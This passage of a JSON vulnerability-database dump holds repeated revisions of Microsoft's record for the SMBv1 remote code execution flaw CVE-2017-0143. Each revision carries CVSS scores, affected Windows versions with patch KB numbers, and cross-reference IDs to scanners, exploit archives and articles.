"KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-19T10:51:44", "differentElements": ["msAffectedSoftware"], "edition": 62}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "e82055c0f190318442e2f0bde68f2113", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-19T14:49:48", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:43970", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:146236", "PACKETSTORM:156196"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700059.PRM", "MS17-010.NASL", "700099.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10977", "KLA10979"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02", "ICSMA-20-170-01"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-19T14:49:48", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-19T14:49:48", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3177186", "KBMS16-110, 3187754", "KB3212646", "KB4013198", "KB4012215", "KB4012217", "KB4012213", "KB4013429", "KB3210721", "KB4012212", "KB4012606", "KB3213986", "KB3205409", "KB3210720", "KB4012216", "KB4012214", "KB4012598", "KB3205401"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-19T14:49:48", "differentElements": ["msAffectedSoftware"], "edition": 63}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-19T16:52:15", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:43970", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:146236", "PACKETSTORM:156196"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700059.PRM", "MS17-010.NASL", "700099.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10977", "KLA10979"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02", "ICSMA-20-170-01"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-19T14:49:48", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-19T14:49:48", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3205401", "KB4012216", "KB4012213", "KB4012215", "KB4013198", "KB4012212", "KB3205409", "KB3213986", "KBMS16-110, 3187754", "KB4013429", "KB3210720", "KB4012214", "KB3212646", "KB4012598", "KB4012217", "KB3210721", "KB3177186", "KB4012606"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": 